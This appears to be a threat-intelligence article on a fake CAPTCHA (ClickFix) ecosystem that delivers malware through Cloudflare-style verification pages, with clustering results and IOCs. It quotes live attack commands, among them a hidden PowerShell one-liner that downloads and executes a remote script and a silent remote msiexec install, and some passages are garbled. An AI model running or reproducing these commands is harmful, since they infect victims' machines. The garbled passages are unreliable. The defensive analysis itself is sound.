a fake CAPTCHA ecosystem that spreads malware by imitating reliable web verification pages. This threat, which is far from a single campaign, masks a variety of delivery methods with visually identical lures that frequently mimic Cloudflare-style challenges. Attackers circumvent defenses without directly compromising services by abusing well-known browser workflows.

The analysis, based on 9,494 tracked assets, reveals how perceptual hashing (pHash) clusters 70% into one dominant visual group, yet execution varies wildly: from clipboard scripts to fileless push notifications. This “Living Off the Web” tactic decouples the trust-gaining interface from payloads, making traditional detection unreliable. Users see a standard “browser verification” page, but behind it lie incompatible models like VBScript downloaders, MSI installers, and Matrix Push C2 frameworks.

It is a reusable layer that can be used by any operator and is not connected by a single family of malware. Important Results and Methods of Delivery Censys used Playwright to render pages in a sandbox, taking screenshots for pHash clustering using a Hamming distance threshold of six. Cluster 0, which has 6,686 assets (70%) and site-specific favicons for legitimacy, is an example of a typical Fake Captcha lure followed by a ClickFix lure (source: Censys).

However, 32 payload variations appeared across silos out of 5,441 that could be examined: 3,227 assets are dominated by clipboard-driven execution. Remote scripts are fetched by VBScript loaders (1,706), such as powershell.exe -w hidden -ep bypass -c "IEX (New-Object Net.WebClient). "DownloadString ('http://95[.]164.53.115:5506/a.ps1'). Net.WebClient is used in PowerShell DownloadFile (1,269).DownloadFile, frequently using string concatenation or other obfuscation techniques.

There are also uncommon MSHTA or BAT variations.

MSI Installer Delivery (1,212 assets): Uses msiexec /i http://compromised-domain[. ]com/verification/check.msi /quiet to avoid scripts. On compromised websites, payloads conceal themselves in "human verification" routes.

1,281 assets in Matrix Push C2: Chrome notification permissions via Notifications are prompted by fileless handoff.JS. The server is at the matrix; no clipboard artifact.Later, Cymru pushes. Admin panels reveal templates for lures that resemble Cloudflare, rerouting after "Allow." An illustration of the pipeline specifically designed for this analysis (source: Censys) Infrastructure silos verify fragmentation: PowerShell to ghost.nestdns[.

]com; MSI to various compromised domains; VBScript to 95[. ]164.53.115:5506 and 78[.]40.209.164:5506. When there is no cross-model overlap, independent operators are reusing the interface.

IOCs and Defender Suggestions Category IOC Examples C2 Servers 95.164.53.115:5506, 78.40.209.164:5506, matrix.cymru Domains ghost.nestdns.com, penguinpublishers.org Payload URLs: http://compromised-domain[. ]com/verification/check.msi Scripts Notifications.js (Matrix integration), http://95[. ]164.53.115:5506/a.ps1, VBS/PowerShell clipboard commands with "-ep bypass" pHash clusters imitating Cloudflare; post-verification notification prompts; Calls from MSIEXEC Defenders need to move past clipboard scans, which miss 14.4% of Cluster 0.

Keep an eye on Sankey-linked execution flows, notification grants following security pages, and verification lures outside of context. Instead, attribution clustering by infra and behavior is tricked by visual similarity. Censys now takes screenshots automatically. For ongoing tracking, use a fake CAPTCHA.

Conditioned trust in web UX is the foundation of this ecosystem. Anticipate more fileless pivots as scripting defenses become more robust.